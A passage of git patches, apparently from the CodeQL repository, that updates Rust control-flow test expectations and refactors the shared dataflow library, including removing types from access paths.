TupleStructPat | variables.rs:209:55:209:56 | a5 | match | +| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | +| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:55:209:56 | a5 | match | | variables.rs:209:55:209:56 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... | match | -| variables.rs:209:62:209:83 | TupleStructPat | variables.rs:209:81:209:82 | a5 | match | +| variables.rs:209:62:209:83 | ...::Third(...) | variables.rs:209:81:209:82 | a5 | match | | variables.rs:209:81:209:82 | a5 | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:210:16:210:24 | print_i64 | variables.rs:210:26:210:27 | a5 | | | variables.rs:210:16:210:28 | print_i64(...) | variables.rs:208:5:211:5 | match tv { ... } | | | variables.rs:210:26:210:27 | a5 | variables.rs:210:16:210:28 | print_i64(...) | | | variables.rs:212:5:215:5 | match tv { ... } | variables.rs:202:21:216:1 | { ... } | | -| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | TupleStructPat | | -| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:28:213:29 | a6 | match | -| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:35:213:57 | TupleStructPat | no-match | +| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | ...::First(...) | | +| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:28:213:29 | a6 | match | +| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:35:213:57 | ...::Second(...) | no-match | | variables.rs:213:9:213:83 | [match(true)] ... \| ... | variables.rs:214:16:214:24 | print_i64 | match | | variables.rs:213:28:213:29 | a6 | variables.rs:213:9:213:83 | [match(true)] ... \| ... | match | -| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:55:213:56 | a6 | match | -| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:61:213:82 | TupleStructPat | no-match | +| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:55:213:56 | a6 | match | +| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:61:213:82 | ...::Third(...) | no-match | | variables.rs:213:35:213:82 | [match(true)] ... \| ... | variables.rs:213:9:213:83 | [match(true)] ... \| ... | match | | variables.rs:213:55:213:56 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... | match | -| variables.rs:213:61:213:82 | TupleStructPat | variables.rs:213:80:213:81 | a6 | match | +| variables.rs:213:61:213:82 | ...::Third(...) | variables.rs:213:80:213:81 | a6 | match | | variables.rs:213:80:213:81 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... | match | | variables.rs:214:16:214:24 | print_i64 | variables.rs:214:26:214:27 | a6 | | | variables.rs:214:16:214:28 | print_i64(...) | variables.rs:212:5:215:5 | match tv { ... } | | @@ -478,14 +478,14 @@ edges | variables.rs:219:18:219:33 | ...::Left(...) | variables.rs:219:9:219:14 | either | | | variables.rs:219:31:219:32 | 32 | variables.rs:219:18:219:33 | ...::Left(...) | | | variables.rs:220:5:225:5 | match either { ... } | variables.rs:218:21:226:1 | { ... } | | -| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | TupleStructPat | | -| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:22:221:23 | a7 | match | -| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:28:221:44 | TupleStructPat | no-match | +| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | ...::Left(...) | | +| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:22:221:23 | a7 | match | +| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:28:221:44 | ...::Right(...) | no-match | | variables.rs:221:9:221:44 | [match(false)] ... \| ... | variables.rs:224:9:224:9 | _ | no-match | | variables.rs:221:9:221:44 | [match(true)] ... \| ... | variables.rs:222:16:222:17 | a7 | match | | variables.rs:221:22:221:23 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | -| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | -| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:42:221:43 | a7 | match | +| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | +| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:42:221:43 | a7 | match | | variables.rs:221:42:221:43 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | | variables.rs:222:16:222:17 | a7 | variables.rs:222:21:222:21 | 0 | | | variables.rs:222:16:222:21 | ... > ... | variables.rs:223:16:223:24 | print_i64 | true | @@ -505,15 +505,15 @@ edges | variables.rs:229:18:229:33 | ...::Left(...) | variables.rs:229:9:229:14 | either | | | variables.rs:229:31:229:32 | 32 | variables.rs:229:18:229:33 | ...::Left(...) | | | variables.rs:231:5:242:5 | match either { ... } | variables.rs:228:21:243:1 | { ... } | | -| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | TupleStructPat | | +| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | ...::Left(...) | | | variables.rs:232:9:233:52 | [match(true)] e | variables.rs:235:13:235:27 | ExprStmt | match | -| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:27:233:29 | a11 | match | -| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:34:233:51 | TupleStructPat | no-match | +| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:27:233:29 | a11 | match | +| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:34:233:51 | ...::Right(...) | no-match | | variables.rs:233:14:233:51 | [match(false)] ... \| ... | variables.rs:241:9:241:9 | _ | no-match | | variables.rs:233:14:233:51 | [match(true)] ... \| ... | variables.rs:232:9:233:52 | [match(true)] e | match | | variables.rs:233:27:233:29 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | -| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | -| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:48:233:50 | a11 | match | +| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | +| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:48:233:50 | a11 | match | | variables.rs:233:48:233:50 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | | variables.rs:234:12:240:9 | { ... } | variables.rs:231:5:242:5 | match either { ... } | | | variables.rs:235:13:235:21 | print_i64 | variables.rs:235:23:235:25 | a11 | | @@ -522,10 +522,10 @@ edges | variables.rs:235:23:235:25 | a11 | variables.rs:235:13:235:26 | print_i64(...) | | | variables.rs:236:13:239:13 | if ... {...} | variables.rs:234:12:240:9 | { ... } | | | variables.rs:236:16:237:15 | let ... = e | variables.rs:237:15:237:15 | e | | -| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:13:239:13 | if ... {...} | no-match | -| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:33:236:35 | a12 | match | +| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:13:239:13 | if ... {...} | no-match | +| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:33:236:35 | a12 | match | | variables.rs:236:33:236:35 | a12 | variables.rs:238:17:238:32 | ExprStmt | match | -| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | TupleStructPat | | +| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | ...::Left(...) | | | variables.rs:237:17:239:13 | { ... } | variables.rs:236:13:239:13 | if ... {...} | | | variables.rs:238:17:238:25 | print_i64 | variables.rs:238:28:238:30 | a12 | | | variables.rs:238:17:238:31 | print_i64(...) | variables.rs:237:17:239:13 | { ... } | | @@ -543,20 +543,20 @@ edges | variables.rs:253:14:253:35 | ...::Second(...) | variables.rs:253:9:253:10 | fv | | | variables.rs:253:33:253:34 | 62 | variables.rs:253:14:253:35 | ...::Second(...) | | | variables.rs:254:5:257:5 | match fv { ... } | variables.rs:252:21:258:1 | { ... } | | -| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | TupleStructPat | | -| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:27:255:29 | a13 | match | -| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:35:255:57 | TupleStructPat | no-match | +| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | ...::First(...) | | +| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:27:255:29 | a13 | match | +| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:35:255:57 | ...::Second(...) | no-match | | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | variables.rs:256:16:256:24 | print_i64 | match | | variables.rs:255:27:255:29 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | -| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:54:255:56 | a13 | match | -| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:61:255:82 | TupleStructPat | no-match | -| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | TupleStructPat | no-match | +| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:54:255:56 | a13 | match | +| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:61:255:82 | ...::Third(...) | no-match | +| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | ...::Fourth(...) | no-match | | variables.rs:255:35:255:82 | [match(true)] ... \| ... | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:255:54:255:56 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... | match | -| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | -| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:79:255:81 | a13 | match | +| variables.rs:255:61:255:82 | ...::Third(...) | variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | +| variables.rs:255:61:255:82 | ...::Third(...) | variables.rs:255:79:255:81 | a13 | match | | variables.rs:255:79:255:81 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... | match | -| variables.rs:255:87:255:109 | TupleStructPat | variables.rs:255:106:255:108 | a13 | match | +| variables.rs:255:87:255:109 | ...::Fourth(...) | variables.rs:255:106:255:108 | a13 | match | | variables.rs:255:106:255:108 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:256:16:256:24 | print_i64 | variables.rs:256:26:256:28 | a13 | | | variables.rs:256:16:256:29 | print_i64(...) | variables.rs:254:5:257:5 | match fv { ... } | | @@ -582,14 +582,14 @@ edges | variables.rs:268:5:268:17 | print_str(...) | variables.rs:265:28:269:1 | { ... } | | | variables.rs:268:5:268:18 | ExprStmt | variables.rs:268:5:268:13 | print_str | | | variables.rs:268:15:268:16 | c1 | variables.rs:268:5:268:17 | print_str(...) | | -| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | TupleStructPat | | +| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | ...::Left(...) | | | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | variables.rs:271:1:275:1 | exit fn param_pattern2 | | | variables.rs:272:5:272:50 | ...: Either | variables.rs:274:5:274:18 | ExprStmt | | -| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:19:272:20 | a9 | match | -| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:25:272:41 | TupleStructPat | no-match | +| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:19:272:20 | a9 | match | +| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:25:272:41 | ...::Right(...) | no-match | | variables.rs:272:6:272:41 | [match(true)] ... \| ... | variables.rs:272:5:272:50 | ...: Either | match | | variables.rs:272:19:272:20 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | -| variables.rs:272:25:272:41 | TupleStructPat | variables.rs:272:39:272:40 | a9 | match | +| variables.rs:272:25:272:41 | ...::Right(...) | variables.rs:272:39:272:40 | a9 | match | | variables.rs:272:39:272:40 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | | variables.rs:273:9:275:1 | { ... } | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | | | variables.rs:274:5:274:13 | print_i64 | variables.rs:274:15:274:16 | a9 | | From 6a8188f8eb196f16faab1f3309e8537bb1847657 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Mon, 2 Dec 2024 08:30:16 +0100 Subject: [PATCH 0770/1267] Rust: fix QL compilation errors after merge from main --- rust/ql/lib/codeql/rust/frameworks/Sqlx.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll b/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll index f00c7375448..5504993ab74 100644 --- a/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll +++ b/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll @@ -14,7 +14,7 @@ private class SqlxQuery extends SqlConstruction::Range { SqlxQuery() { this.asExpr().getExpr() = call and - call.getFunction().(PathExpr).getPath().getResolvedPath() = + call.getFunction().(PathExpr).getResolvedPath() = [ "crate::query::query", "crate::query_as::query_as", "crate::query_with::query_with", "crate::query_as_with::query_as_with", "crate::query_scalar::query_scalar", From 70a8bc302ccb129e1b6808dd7fee64723e385147 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 12:48:19 +0100 Subject: [PATCH 0771/1267] Dataflow: Rename typecheckStore. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 36 ++++++++----------- 1 file changed, 15 insertions(+), 21 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 96184a607f0..b090832647a 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1410,8 +1410,8 @@ module MakeImpl Lang> { bindingset[node, ap, isStoreStep] predicate stepFilter(NodeEx node, Ap ap, boolean isStoreStep); - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType); + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2); default predicate enableTypeFlow() { any() } } @@ -1641,7 +1641,9 @@ module MakeImpl Lang> { not inBarrier(node2, state) and PrevStage::storeStepCand(node1, apa1, c, node2, contentType, containerType) and t2 = getTyp(containerType) and - typecheckStore(t1, contentType) + // We need to typecheck stores here, since reverse flow through a getter + // might have a different type here compared to inside the getter. + typecheck(t1, getTyp(contentType)) ) } @@ -3742,8 +3744,8 @@ module MakeImpl Lang> { bindingset[node, ap, isStoreStep] predicate stepFilter(NodeEx node, Ap ap, boolean isStoreStep) { any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { any() } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { any() } predicate enableTypeFlow() { none() } } @@ -3855,8 +3857,8 @@ module MakeImpl Lang> { bindingset[node, ap, isStoreStep] predicate stepFilter(NodeEx node, Ap ap, boolean isStoreStep) { any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { any() } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { any() } } private module Stage3 = MkStage::Stage; @@ -3975,12 +3977,8 @@ module MakeImpl Lang> { if clearExceptStore(node, ap) then isStoreStep = true else any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { - // We need to typecheck stores here, since reverse flow through a getter - // might have a different type here compared to inside the getter. - compatibleTypesFilter(typ, contentType) - } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } } private module Stage4 = MkStage::Stage; @@ -4227,10 +4225,8 @@ module MakeImpl Lang> { if clearExceptStore(node, ap) then isStoreStep = true else any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { - compatibleTypesFilter(typ, contentType) - } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } } private module Stage5 = MkStage::Stage; @@ -4426,10 +4422,8 @@ module MakeImpl Lang> { if clearExceptStore(node, ap) then isStoreStep = true else any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { - compatibleTypesFilter(typ, contentType) - } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } } module Stage6 = MkStage::Stage; From 5d13d3b43416f4b6a88d0d76fcf26378597e7a6d Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 13:02:33 +0100 Subject: [PATCH 0772/1267] Dataflow: Refactor - deduplicate fwdFlowRead+consCand join. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index b090832647a..0c5fec9a936 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1533,11 +1533,8 @@ module MakeImpl Lang> { ) or // read - exists(Typ t0, Ap ap0, Content c | - fwdFlowRead(t0, ap0, c, _, node, state, cc, summaryCtx) and - fwdFlowConsCand(t0, ap0, c, t, ap) and - apa = getApprox(ap) - ) + fwdFlowRead(_, _, _, _, node, t, ap, state, cc, summaryCtx) and + apa = getApprox(ap) or // flow into a callable without summary context fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap) and @@ -1676,7 +1673,7 @@ module MakeImpl Lang> { } pragma[nomagic] - private predicate fwdFlowRead( + private predicate fwdFlowRead0( Typ t, Ap ap, Content c, NodeEx node1, NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { @@ -1689,6 +1686,15 @@ module MakeImpl Lang> { ) } + pragma[nomagic] + private predicate fwdFlowRead( + NodeEx node1, Typ t1, Ap ap1, Content c, NodeEx node2, Typ t2, Ap ap2, FlowState state, + Cc cc, SummaryCtx summaryCtx + ) { + fwdFlowRead0(t1, ap1, c, node1, node2, state, cc, summaryCtx) and + fwdFlowConsCand(t1, ap1, c, t2, ap2) + } + pragma[nomagic] private predicate fwdFlowIntoArg( ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, @@ -2127,10 +2133,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate readStepFwd(NodeEx n1, Ap ap1, Content c, NodeEx n2, Ap ap2) { - exists(Typ t1 | - fwdFlowRead(t1, ap1, c, n1, n2, _, _, _) and - fwdFlowConsCand(t1, ap1, c, _, ap2) - ) + fwdFlowRead(n1, _, ap1, c, n2, _, ap2, _, _, _) } pragma[nomagic] @@ -3200,10 +3203,9 @@ module MakeImpl Lang> { ) or // read - exists(NodeEx mid, Typ t0, Ap ap0, Content c | + exists(NodeEx mid, Typ t0, Ap ap0 | pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and - fwdFlowRead(t0, ap0, c, mid, node, state, cc, summaryCtx) and - fwdFlowConsCand(t0, ap0, c, t, ap) and + fwdFlowRead(mid, t0, ap0, _, node, t, ap, state, cc, summaryCtx) and label = "" and isStoreStep = false ) From e9bd1e5b79cd106899f64c41e249dde20fdbcd65 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 13:31:51 +0100 Subject: [PATCH 0773/1267] Dataflow: Remove types from access paths. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 220 ++++++++---------- 1 file changed, 95 insertions(+), 125 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 0c5fec9a936..084d9976f9f 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1330,8 +1330,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t); - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail); + bindingset[c, tail] + Ap apCons(Content c, Ap tail); /** * An approximation of `Content` that corresponds to the precision level of @@ -1494,11 +1494,6 @@ module MakeImpl Lang> { ) } - pragma[nomagic] - private predicate typeStrengthen(Typ t0, Ap ap, Typ t) { - fwdFlow1(_, _, _, _, t0, t, ap, _) and t0 != t - } - pragma[nomagic] private predicate fwdFlow0( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa @@ -1526,9 +1521,9 @@ module MakeImpl Lang> { summaryCtx = TSummaryCtxNone() or // store - exists(Content c, Typ t0, Ap ap0 | - fwdFlowStore(_, t0, ap0, c, t, node, state, cc, summaryCtx) and - ap = apCons(c, t0, ap0) and + exists(Content c, Ap ap0 | + fwdFlowStore(_, _, ap0, c, t, node, state, cc, summaryCtx) and + ap = apCons(c, ap0) and apa = getApprox(ap) ) or @@ -1652,12 +1647,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowConsCand(Typ t2, Ap cons, Content c, Typ t1, Ap tail) { fwdFlowStore(_, t1, tail, c, t2, _, _, _, _) and - cons = apCons(c, t1, tail) - or - exists(Typ t0 | - typeStrengthen(t0, cons, t2) and - fwdFlowConsCand(t0, cons, c, t1, tail) - ) + cons = apCons(c, tail) } pragma[nomagic] @@ -2125,9 +2115,9 @@ module MakeImpl Lang> { } pragma[nomagic] - private predicate storeStepFwd(NodeEx node1, Typ t1, Ap ap1, Content c, NodeEx node2, Ap ap2) { - fwdFlowStore(node1, t1, ap1, c, _, node2, _, _, _) and - ap2 = apCons(c, t1, ap1) and + private predicate storeStepFwd(NodeEx node1, Ap ap1, Content c, NodeEx node2, Ap ap2) { + fwdFlowStore(node1, _, ap1, c, _, node2, _, _, _) and + ap2 = apCons(c, ap1) and readStepFwd(_, ap2, c, _, _) } @@ -2247,7 +2237,7 @@ module MakeImpl Lang> { or // store exists(Ap ap0, Content c | - revFlowStore(ap0, c, ap, _, node, state, _, returnCtx, returnAp) and + revFlowStore(ap0, c, ap, node, state, _, returnCtx, returnAp) and revFlowConsCand(ap0, c, ap) ) or @@ -2302,11 +2292,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate revFlowStore( - Ap ap0, Content c, Ap ap, Typ t, NodeEx node, FlowState state, NodeEx mid, - ReturnCtx returnCtx, ApOption returnAp + Ap ap0, Content c, Ap ap, NodeEx node, FlowState state, NodeEx mid, ReturnCtx returnCtx, + ApOption returnAp ) { revFlow(mid, state, returnCtx, returnAp, ap0) and - storeStepFwd(node, t, ap, c, mid, ap0) + storeStepFwd(node, ap, c, mid, ap0) } /** @@ -2445,7 +2435,7 @@ module MakeImpl Lang> { ) { exists(Ap ap2 | PrevStage::storeStepCand(node1, _, c, node2, contentType, containerType) and - revFlowStore(ap2, c, ap1, _, node1, _, node2, _, _) and + revFlowStore(ap2, c, ap1, node1, _, node2, _, _) and revFlowConsCand(ap2, c, ap1) ) } @@ -2454,7 +2444,7 @@ module MakeImpl Lang> { exists(Ap ap1, Ap ap2 | revFlow(node2, _, _, _, pragma[only_bind_into](ap2)) and readStepFwd(node1, ap1, c, node2, ap2) and - revFlowStore(ap1, c, pragma[only_bind_into](ap2), _, _, _, _, _, _) + revFlowStore(ap1, c, pragma[only_bind_into](ap2), _, _, _, _, _) ) } @@ -2468,11 +2458,11 @@ module MakeImpl Lang> { pragma[nomagic] predicate revFlowAp(NodeEx node, Ap ap) { revFlow(node, _, _, _, ap) } - private predicate fwdConsCand(Content c, Typ t, Ap ap) { storeStepFwd(_, t, ap, c, _, _) } + private predicate fwdConsCand(Content c, Ap ap) { storeStepFwd(_, ap, c, _, _) } - private predicate revConsCand(Content c, Typ t, Ap ap) { + private predicate revConsCand(Content c, Ap ap) { exists(Ap ap2 | - revFlowStore(ap2, c, ap, t, _, _, _, _, _) and + revFlowStore(ap2, c, ap, _, _, _, _, _) and revFlowConsCand(ap2, c, ap) ) } @@ -2480,14 +2470,14 @@ module MakeImpl Lang> { private predicate validAp(Ap ap) { revFlow(_, _, _, _, ap) and ap instanceof ApNil or - exists(Content head, Typ t, Ap tail | - consCand(head, t, tail) and - ap = apCons(head, t, tail) + exists(Content head, Ap tail | + consCand(head, tail) and + ap = apCons(head, tail) ) } - additional predicate consCand(Content c, Typ t, Ap ap) { - revConsCand(c, t, ap) and + additional predicate consCand(Content c, Ap ap) { + revConsCand(c, ap) and validAp(ap) } @@ -3197,7 +3187,7 @@ module MakeImpl Lang> { exists(NodeEx mid, Content c, Typ t0, Ap ap0 | pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and fwdFlowStore(mid, t0, ap0, c, t, node, state, cc, summaryCtx) and - ap = apCons(c, t0, ap0) and + ap = apCons(c, ap0) and label = "" and isStoreStep = true ) @@ -3584,8 +3574,8 @@ module MakeImpl Lang> { ) { fwd = true and nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _)) and - fields = count(Content f0 | fwdConsCand(f0, _, _)) and - conscand = count(Content f0, Typ t, Ap ap | fwdConsCand(f0, t, ap)) and + fields = count(Content f0 | fwdConsCand(f0, _)) and + conscand = count(Content f0, Ap ap | fwdConsCand(f0, ap)) and states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _)) and tuples = count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap | @@ -3600,8 +3590,8 @@ module MakeImpl Lang> { or fwd = false and nodes = count(NodeEx node | revFlow(node, _, _, _, _)) and - fields = count(Content f0 | consCand(f0, _, _)) and - conscand = count(Content f0, Typ t, Ap ap | consCand(f0, t, ap)) and + fields = count(Content f0 | consCand(f0, _)) and + conscand = count(Content f0, Ap ap | consCand(f0, ap)) and states = count(FlowState state | revFlow(_, state, _, _, _)) and tuples = count(NodeEx n, FlowState state, ReturnCtx returnCtx, ApOption retAp, Ap ap | @@ -3679,11 +3669,10 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { any() } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result = true and exists(c) and - exists(t) and if tail = true then Config::accessPathLimit() > 1 else any() } @@ -3767,8 +3756,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { any() } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.getAHead() = c and exists(t) and exists(tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.getAHead() = c and exists(tail) } class ApHeadContent = ContentApprox; @@ -3892,8 +3881,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { result = t } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.getHead() = c and exists(t) and exists(tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.getHead() = c and exists(tail) } class ApHeadContent = Content; @@ -3991,7 +3980,7 @@ module MakeImpl Lang> { */ private predicate expensiveLen2unfolding(Content c) { exists(int tails, int nodes, int apLimit, int tupleLimit | - tails = strictcount(DataFlowType t, AccessPathFront apf | Stage4::consCand(c, t, apf)) and + tails = strictcount(AccessPathFront apf | Stage4::consCand(c, apf)) and nodes = strictcount(NodeEx n, FlowState state | Stage4::revFlow(n, state, any(AccessPathFrontHead apf | apf.getHead() = c)) @@ -4007,12 +3996,12 @@ module MakeImpl Lang> { private newtype TAccessPathApprox = TNil() or - TConsNil(Content c, DataFlowType t) { - Stage4::consCand(c, t, TFrontNil()) and + TConsNil(Content c) { + Stage4::consCand(c, TFrontNil()) and not expensiveLen2unfolding(c) } or - TConsCons(Content c1, DataFlowType t, Content c2, int len) { - Stage4::consCand(c1, t, TFrontHead(c2)) and + TConsCons(Content c1, Content c2, int len) { + Stage4::consCand(c1, TFrontHead(c2)) and len in [2 .. Config::accessPathLimit()] and not expensiveLen2unfolding(c1) } or @@ -4022,12 +4011,11 @@ module MakeImpl Lang> { } /** - * Conceptually a list of `Content`s where nested tails are also paired with a - * `DataFlowType`, but only the first two elements of the list and its length - * are tracked. If data flows from a source to a given node with a given - * `AccessPathApprox`, this indicates the sequence of dereference operations - * needed to get from the value in the node to the tracked object. The - * `DataFlowType`s indicate the types of the stored values. + * Conceptually a list of `Content`s, but only the first two elements of + * the list and its length are tracked. If data flows from a source to a + * given node with a given `AccessPathApprox`, this indicates the sequence + * of dereference operations needed to get from the value in the node to + * the tracked object. */ abstract private class AccessPathApprox extends TAccessPathApprox { abstract string toString(); @@ -4038,8 +4026,8 @@ module MakeImpl Lang> { abstract AccessPathFront getFront(); - /** Holds if this is a representation of `head` followed by the `typ,tail` pair. */ - abstract predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail); + /** Holds if this is a representation of `head` followed by `tail`. */ + abstract predicate isCons(Content head, AccessPathApprox tail); } private class AccessPathApproxNil extends AccessPathApprox, TNil { @@ -4051,23 +4039,17 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontNil() } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { none() } + override predicate isCons(Content head, AccessPathApprox tail) { none() } } abstract private class AccessPathApproxCons extends AccessPathApprox { } private class AccessPathApproxConsNil extends AccessPathApproxCons, TConsNil { private Content c; 